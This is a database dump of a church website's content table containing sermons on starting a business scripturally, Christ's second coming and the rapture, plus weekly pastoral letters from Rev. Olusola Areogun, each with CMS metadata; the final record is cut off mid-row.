(12, 'How to Start a Business Scripturally', 'business', 4, 1, '<p>Text:  Proverbs 3:9-10, 10:22,   Deuteronomy  28:8, 26:1-2, Leviticus 27:30,  II Chronicles  31:5.</p>\r\n<p><strong>INTRODUCTION</strong></p>\r\n<p>God\'s  expectation  for his  people  is that they will lend  to many nations and not borrow, they will be employers of labor with multiple  streams of income.   It  is not enough to have a paying job or a salary  job; you need to make more room for the blessings  of God that  are due upon your life through multiple streams of income.</p>\r\n', '\r\n<p>You should  find out what business  the  Lord  wants  you to engage  in so that you will not get involved in trial and error  and thus, make room for the expression  of God\'s  blessing upon your life.</p>\r\n<p>There is a way to start  and do business  scripturally that will connect you to the abundance  that  is available in God\'s kingdom and there  is also  a way to do business  ordinarily  that will make you to have the common  outcome  that  every other  natural  man is having and even sometimes  failures.   But may you connect to the  abundance  that  is available  in God\'s kingdom in Jesus  name.</p>\r\n<p>Let us consider the following steps that will help you:</p>\r\n<p><strong>1. DIVINE  IDEA:</strong> Let your business  be an idea  from the Lord.  Don\'t just pick  a business  idea because  it is famous  or  because  that  is what everybody  is doing. GET A WORD FROM THE LORD, that will be the scriptural ground that you are standing  upon, Don\'t pick an idea  from your environment,  rather  wait  upon the Lord and let  God who knows the future give you a direction that will lead you to your wealthy place.</p>\r\n<p>a.When God gives you an idea he expects you to operate it at the level of God,  excellence is not negotiable.  Do not ever operate a divine idea  at a mediocre level. Any business idea that you are executing, do it well, it\'s going global,  operate  in a global mindset  and dimension.   For example, God  gives you a business  idea on groundnut,  it is  not for you to start putting groundnut in five-naira  transparent   nylon and say,and you are working a divine idea, at this  level  of your training  in  God. You should begin to find out what are the things you can make from groundnut, like  homemade   peanut   butter,  groundnut  spread,  and  wholesales supply  of all forms of groundnut ... Think  big!  Think grand!  Think  and function  at the level  of God.</p>\r\n<p>b.Every idea from God will be blessed of God ifyou workout  the details.</p>\r\n<p>c.Prepare  well.  Let  your preparation   be at the level  of God, what will last must be thoroughly prepared  for.</p>\r\n<p>d.You  should start  with spiritual   preparation.   Birth it forth in prayer.</p>\r\n<p>Before you start telling  people  something, be sure it is established.</p>\r\n<p><strong>2. SOW A COMMENSURATE TAKE  OFF SEED AT THE BEGINNING OF YOUR BUSINESS:</strong></p>\r\n<p>With  a proper  understanding   of a kingdom system sowing your seed will connect your business  to a ripple  of divine flows and harvest. How you start  is always crucial.  You can\'t  plan  to start a transport  company and your starting  seed  is  350 naira,  what you have done is that you have drawn  a limiting  line  to the expanse  and  ,magnitude   of what YOUR BUSINESS  CAN BECOME.  WHEN  YOU SOW YOUR  SEED,  you sow commensurate  to the future that God has earmarked  for the business.</p>\r\n<p><strong>3. TAKE THE ANOINTING ALONG:</strong></p>\r\n<p>Receive impartation  for your business  and be sure you are a proper son in the house so that the anointing will flow effortlessly into your affairs.</p>\r\n<p><strong>4. LET  GOD GIVE YOU THE NAME OF YOUR BUSINESS:</strong></p>\r\n<p>Name   your   business    by  inspiration     not   by  environmental permutation.  Divine names will always draw divine favor.</p>\r\n<p><strong>5. PRESS FURTHER  IN THE PRESENCE  OF GOD FOR DIVINE STEPS.</strong></p>\r\n<p>Press further  in prayer and let the Holy  Spirit bring instructions  to your  heart  on the steps  to take. Also,  press  further  in finding out details about  the business.   Make  sure  you do not spare  in searching  for information   and details from every necessary quarter.</p>\r\n<p><strong>6. PARTNER  YOUR BUSINESS  WITH THE ANOINTING AND THE VISION</strong></p>\r\n<p>Partnering  with the vision and the anointing  will always secure the future of your business. Make sure it is constant and regular.  It could be a certain  percentage of your income that you always  set aside to partner  with  the vision.  By so doing  you engage  the force of the calling and the vision  to command always a blessing in the direction of your business.</p>\r\n<p>Partner with God over the business regularly  by sowing seeds. There</p>\r\n<p>are three things that you sow /give to, these are;</p>\r\n<ul>\r\n<li>the work of God</li>\r\n<li>the house of God </li>\r\n<li>the man of God</li>\r\n</ul>\r\n<p><strong>7. BE  FAITHFUL   WITH YOUR FIRST FRUIT SEED, THIS  IS CRUCIAL.</strong></p>\r\n<p>DO NOT EAT YOUR FIRST FRUIT.  Then,  always honor the lord  with the first fruit of the increase of your business.</p>\r\n<p>Your first fruit will do three things:</p>\r\n<p>a. It  will ensure  continuity:  no environmental  condition  can dry up your business because it is powered from a higher covenant. b.ltensures  increasing  promotion.</p>\r\n<p>c. lt secures your place  in abundance.</p>\r\n<p><strong>8. ENSURE THAT YOU ARE A FAITHFUL TITHER.</strong></p>\r\n<p>Pay your tithe regularly  and particularly  the first one tenth tenth of your income and not one tenth  of your income. As a faithful tither you activate the covenant that devourer  is rebuked  for your sake, nothing can eat up your business.</p>\r\n<p><strong>9. DO NOT LIMIT YOURSELF IN THE SCOPE OF YOUR BUSINESS.</strong></p>\r\n<p>Let God be the owner who draws the scope and directs  it while you are the staff.  PUT YOURSELF  ON A SALARY SCALE in your business. SEPARATE  YOURSELF  FROM  THAT BUSINESS,   DO NOT ASSUME THAT ALL THE MONEY  IS YOUR OWN.</p>\r\n<p><strong>10. FULFILL ALL RIGHTEOUSNESS.</strong></p>\r\n<p>Follow  all necessary  procedures  and processes  that will legitimize your  business.   Don\'t  cut corners,   pay your  employees  and  don\'t cheat your customers.</p>\r\n<p><strong>11. BE PRAYERFUL AND BE VIGILANT.</strong></p>\r\n<p>Do not allow  or give room for occultic in-roads  or attacks. Don\'t  be careless   such  that  you  open  yourself   up  to  occultic  attack.  Be watchful; don\'t let business   take you away from God. As the business grows  wider, you need  to be more  prayerful,  more  sensitive  and stronger. You cannot afford to joke and take lightly your spiritual  life because the wider the scope of your business  the more importantly you take your prayer life.</p>\r\n<p><strong>CONCLUSION</strong></p>\r\n<p>Learn  to  run  your  business   in the  kingdom  way, with  kingdom principles  and kingdom standards  and begin to enjoy outcomes  in the realm  of abundance.</p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-01-01 11:28:56', 196, '', 0, '0000-00-00 00:00:00', '2017-05-03 00:24:25', 196, '2017-01-01 11:28:56', '0000-00-00 00:00:00', 0, 1, 1, 0, 0, '', '', '', '', 21503, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(13, 'Father\'s Heart (08/01/2017)', 'father-s-hearth-08-01-2016', 5, 1, '<p><em><strong>Dearly beloved,</strong></em></p>\r\n<p>It is 2017 Mercy! The Lord has spoken expressly to us concerning this year and there has been rain of Impartations upon us. All these impartations and Covenants will mark your life this year despite the situation around you. There might be evil reports but you must hold fast to the words that God has given us in the house for this year.</p>\r\n', '\r\n<p>This year you must have the right spirit dressing. God will not give you what you are not prepared for; He will give you only what you are ready for. Dressing is crucial to times and season. There is cold season dress and hot season dress; dressing is crucial to occasions; dressing is crucial to events; dressing shows who you are; dressing reflects your position and status; dressing reflects positions; Dressing also determines your protections. Be correctly dressed. </p>\r\n<p>In Numbers chapters 13 and 14, Caleb and Joshua had the right dressing to possess what the others ran away from―the Promised Land. There are spirits you will need to wear as garments in 2017. This year you will need the following dressings:</p>\r\n<p>- Spirit of Accuracy: A spirit of precision that draws you with sharpness to where your things are. Concerning any matter, the two things you need to do is: get it right and get better. Don’t spend the bulk of your time getting it right, get it right on time and then keep getting better. </p>\r\n<p>- Spirit of Faith: When the offer of God comes, you will only be able to take it by your faith. There are three kinds of faith the Bible talks of: no faith, little faith and great faith. God gave us a key for this year: God through the names of Jesus by faith. You must carry the spirit of faith―that nature that causes a man to believe deep inside that God with me, we will do it. Let your heart be filled with faith as you go into 2017. Don’t ask for valley in 2017, ask for mountains!</p>\r\n<p>- Spirit of Truth: There are all kind of evil deception that the Bible says will take place in these last days but men with the spirit of truth will not be deceived. It takes the spirit of truth to protect a man when he interacts with deceptive men in the arena of life. You must wear that spirit this year.</p>\r\n<p>- Spirit of Courage: It’s what makes a man to keep doing whats right even when he is afraid. Boldness is about making face, courage is a thing of the heart. A bold man can start a fight but a man of  courage will actually end the fight. Before God takes you to a future, he works upon your heart to give you the kind of heart that can take the road.</p>\r\n<p>- Spirit of Victory: The spirit of victory assures victory every time. Winning is an event, but a winner is a spirit. There is a difference between an event and a spirit. The spirit of victory does not say the enemy will not come, it just tells the enemy, “listen to me, you’ve picked the wrong opponent, get ready to lose because I am ordained to win.” And he will give it what it takes. The spirit of victory knows no defeat; Caleb carried it, Paul also carried it. You must carry it!</p>\r\n<p>- Spirit of Life: There is a life that the enemy cannot steal.</p>\r\n<p>- Spirit of Accountability: This spirit is what will do all that it takes lawfully at all times, while you are pleasing God. Daniel carried that Spirit, Joseph carried that spirit. There’s nobody that succeeds in life―legally or illegally―that does not face the accuser. The only person that the accuser will not face is a failure. But the minute you decide to join the rank of the successful, get ready for the accusation. Let your accountability be ready before the accusation comes. The spirit of accountability is the spirit that pays attention to details. People will call you all kind of funny names, but the right spirit will give you the future. Nobody has a future carrying wrong spirit.</p>\r\n<p>Till next week, go and win with Jesus.</p>\r\n<p><em><strong>God’s servant,</strong></em></p>\r\n<p><em><strong>Rev. Olusola Areogun</strong></em></p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-01-07 21:48:47', 199, '', 0, '0000-00-00 00:00:00', '2017-01-15 15:48:43', 196, '2017-01-07 21:48:47', '0000-00-00 00:00:00', 0, 1, 4, 0, 3, '', '', '', '', 2819, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(14, 'The Hope of Christ\'s Second Coming', 'the-hope-of-christ-s-second-coming', 2, 1, '<p>TEXT: Rev 1:7-9, Acts 1:9-11: “And to wait for his Son from heaven, whom he raised from the dead, even Jesus, which delivered us from the wrath to come.”1 Thessalonians 1:10 </p>\r\n<p>In our text above, Paul was re-enacting their hopes in the second coming of the Lord. He admonished the Church to wait for Him. It is interesting to know that Jesus is still coming back.</p>\r\n', '\r\n<p>Our hope is not a hopeless hope. You don’t tell someone to wait needlessly or endlessly for somebody that you are not sure if he is coming or not. The statement that Paul made was born out of his deep conviction that Jesus is coming again.</p>\r\n<p>Jesus is coming back as he left in physical form, “all the eyes shall see him”. There may be tribulation but in all this we must learn patience that God has not abandoned us. Standing by the word of God and testimony of Jesus Christ especially in these last days will certainly bring opposition and tribulation.</p>\r\n<p>There are questions that will determine the state of our hope for the coming of Christ:</p>\r\n<ol>\r\n<li>What is your present status as believers? There is a condition that you must bring yourself into if you are hoping for Him. Why? Because there is a state He’s expecting you to be in to be acceptable. And everyone who has this hope [resting] on Him cleanses (purifies) himself just as He is pure (chaste, undefiled, guiltless). 1 John 3:3(Amp). Everyone that is hoping for the coming must live ready, in such a way that when the Lord cometh shall find him so doing(Luke 12:43). Jesus is not coming back for the backsliders, He’s not coming back for the hypocrite, and He’s not coming back for those living in sin. He is coming back for the saints</li>\r\n<li>How do you relate with the reality of the end-time? The major disparity between a Christian and an unbeliever is in the hopefulness that one day, sooner or later, Christ will come for us. “There is hope in our future and there is future in our hope”. An unbeliever is somehow hopeless (1 Cor. 1:17-18, 2Thes 3:5). Living with this consciousness makes you inseparable from the love of Christ (Romans 8:35-39) </li>\r\n</ol>\r\n<p>Now if the ministration of condemnation be glory, much more doth the ministration of righteousness exceed in glory. If in the Old Testament which is a shadow of the new, purity and holiness is a standard, much more is purity and holiness demanded of the church of Jesus Christ. This is why Christ gave himself for the church, “that he might sanctify and cleanse it with the washing of water by the word, that he might present it to himself a glorious church, not having spot, or wrinkle, or any such thing; but is should be holy and without blemish. Ephesians 5:26-26.</p>\r\n<p>Let every member of the church of Christ therefore stand by the admonition, ‘to touch not the unclean thing”. Our hope of waiting for his second coming is worth waiting for, Live everyday with the consciousness that our Lord will soon return.</p>\r\n<p>Live ready, Live holy and Live pure.</p>', NULL, NULL, '[]', '', '2017-01-07 22:03:01', 196, '', 0, '0000-00-00 00:00:00', '2017-01-15 06:35:30', 196, '2017-01-07 22:03:01', '0000-00-00 00:00:00', 0, 1, 5, 0, 0, '', '', '', '', 4120, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(15, 'Are you prepared for Rapture?', 'rapture', 2, 1, '<p class=\"MsoNormal\">Text: 1Thes4:14-18; 1 John3:2, Matt.24:3, 27-51, 25:31-46; Jude 14; Rev.9:11-21; Zech 14:1-5 </p>\r\n<p class=\"MsoNormal\">Rapture   is a military term meaning “a quick take away\". Hence, the Bible says in 1 Thessalonians 4:17. \"Then we which are alive and remain shall be caught up together with them in the clouds, to meet the Lord in the air: and so shall we ever be with the Lord\".</p>\r\n<p class=\"MsoNormal\">The very next event on God\'s end time calendar   is the rapture of the church.   This refers to the catching up of all the believers   in Christ for a glorious meeting with Christ in the air. And   one notable thing about it is that it is imminent and could take place any moment.</p>\r\n', '\r\n<p class=\"MsoNormal\">The dead in Christ will arise first and then we that are alive (1 Thess. 2:9, 4:13-17, 5:23, 1 Cor. 15:15-58, 2 Thess. 2:1, 7-8)</p>\r\n<p class=\"MsoNormal\">A type of Christ   rapture of saints is  found in the Old  Testament story  of Elijah and  Elisha in 2 Kings   2:11  \"and suddenly  there appeared  a chariot of fire ... \" However,  rapture  still  differs   from the Second  Coming of Jesus  Christ  which  is the visible,   in which every eye shall see Him with his  saints to put end to the misrule of Satan  and  his agents;  hence,  establishing   the  kingdom  of heaven on earth.  Mat 24:30-31</p>\r\n<p class=\"MsoNormal\">Factors that can hinder a Christian from going with Christ at the rapture:</p>\r\n<ol>\r\n<li class=\"MsoNormal\"><strong>Leaving your first love.</strong>  Rev. 2:4-5; Rev.3:15-16, Mark 8:38. When you backslide and begin to tolerate   evil things you have one detest.</li>\r\n<li class=\"MsoNormal\"><strong>Holding unto strange and demonic doctrines.</strong>   These are doctrines   that directly conflict with the written word of God, doctrines that permits what God forbids-   Rev.  2:14-15, Eph.4:11-14, 1 Tim.4:1.</li>\r\n<li class=\"MsoNormal\"><strong>Giving   heed to witchcraft and seducing spirits (the spirit of Jezebel) and also being a seducer</strong>. Rev.  2:20-23, 1 Tim.  4:1.</li>\r\n<li class=\"MsoNormal\"><strong>Hypocrisy:</strong>   Having a form of godliness but denying the power thereof.  Being sanctimonious without sanctification, religious    yet rebellious. These have an appearance   of godliness but they are full of sin and defilement.    They are spiritually dead-  Rev.3:1-4, 2Tim 3:5, 1Tim4:2.</li>\r\n<li class=\"MsoNormal\"><strong>The deceitfulness of riches, pursuit of wealth at the expense of right standing   with God:</strong> Rev.  3:17-18, Matthew, 13:22. 2 Timothy 3:1-4</li>\r\n<li class=\"MsoNormal\"><strong>Covetousness:</strong> Inordinate desire, excessively eager to obtain and possess greed. 1 Cor 6:10 says they shall not inherit the kingdom   of God. \"I see ....l take\" not  minding  who owns it or how I  got it!</li>\r\n<li class=\"MsoNormal\"><strong>Blasphemy:</strong> Means irrelevance towards something considered sacred or inviolable.   It is the act of insulting or showing   contempt for the things of God.  It is profanity-   Matt.12:13.    Rev.  2:9.</li>\r\n<li class=\"MsoNormal\"><strong>Disobedience   to parents:</strong> God expects children to honour and obey their parents in accordance to the will of God children, obey your parents IN THE LORD (Eph 6:1).</li>\r\n<li class=\"MsoNormal\"><strong>Despisers  of those that are good:</strong> Cynical, haters of good, fault finders. We have a good example   in the Pharisees and Sadducees.  Despite the good works that Jesus came to do on the earth, they despised him and hated him.</li>\r\n<li class=\"MsoNormal\"><strong>Works of Flesh:</strong> Galatians   5:19-21 </li>\r\n<li class=\"MsoNormal\"><strong>And such like:</strong> Every other unlisted work of the flesh that violates   the scripture   and condemns your conscience. Using the above factors as a check list, is there still any of these remaining in your life? Take a decision today to make the rapture.</li>\r\n</ol>\r\n<p><strong>God bless you.</strong></p>\r\n<p> </p>\r\n<p class=\"MsoNormal\"> </p>', NULL, NULL, '[]', '', '2017-01-15 06:35:42', 196, '', 0, '0000-00-00 00:00:00', '2017-01-22 08:56:36', 196, '2017-01-15 06:35:42', '0000-00-00 00:00:00', 0, 1, 6, 0, 4, '', '', '', '', 3592, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(16, 'Father\'s Heart (15/01/2017)', 'father-s', 2, 1, '<p>Dearly beloved,</p>\r\n<p>Take note of the following things that you must take along as you go into 2017:</p>\r\n<p>1. The Sword of the Spirit: Load yourself with words from God as you are going into the year. Whatever your work is―a doctor, a banker, a business man―load yourself with words from God.</p>\r\n', '\r\n<p>2. Take a Covenant Mindset: God is a covenant keeping God; He remembers covenant. Understand you are not an ordinary human being, you are a covenant child of God. There is a covenant between you and God Almighty sealed in the blood of Jesus. As you work on this planet you have a covenant with God.</p>\r\n<p>3.  Sure Mercies of God: You must understand that the sure mercies of God that he gave to David is what he calls us to enjoy this year.</p>\r\n<p>4. The Blessing: You must come under the blessing and stay under the blessing. We are blessed beyond the curse. We are blessed beyond the recession, we are blessed beyond the problem. To be blessed simply means there is something on your life that makes you to have a positive outcome when you put forth effort in life. It’s a supernatural influence. The blessing is a supernatural force, sometimes it can be released in words, but whether it’s released in words or provoked by your action, it’s something that wraps itself around you and changes your atmosphere. The blessing affects people’s response towards you and causes it to be favourable towards your outcome.</p>\r\n<p>When a man is cursed, even at the best of his effort, his outcome is lesser than what is required.</p>\r\n<p>When you are blessed you cannot be cursed! So, don’t be afraid. The only person that can curse you and it will stay is God Almighty and God will not allow anybody to curse you. Every other agent that can speak words that affect men have taken their source lesser than God, therefore it cannot stay.</p>\r\n<p>Balaam tried it against Israel but he failed because they were a people blessed of the Lord. If the enemy picks on you, he has picked the wrong candidate to fight, for it’s written over your life, “surely there is no enchantment against you, neither is there any divination against you.” You are a carrier of the blessing. </p>\r\n<p>And you have to settle that in your life as you step into 2017, going from today. There are only two ways that you are going, forward and upward. </p>\r\n<p>Till next week, go and win with Jesus.</p>\r\n<p>God’s servant,</p>\r\n<p>Rev. Olusola Areogun</p>', NULL, NULL, '[]', '', '2017-01-15 09:35:33', 199, '', 0, '0000-00-00 00:00:00', '2017-01-22 10:19:15', 196, '2017-01-15 09:35:33', '0000-00-00 00:00:00', 0, 1, 7, 0, 0, 'Father\'s Heart', '', '', '', 2238, 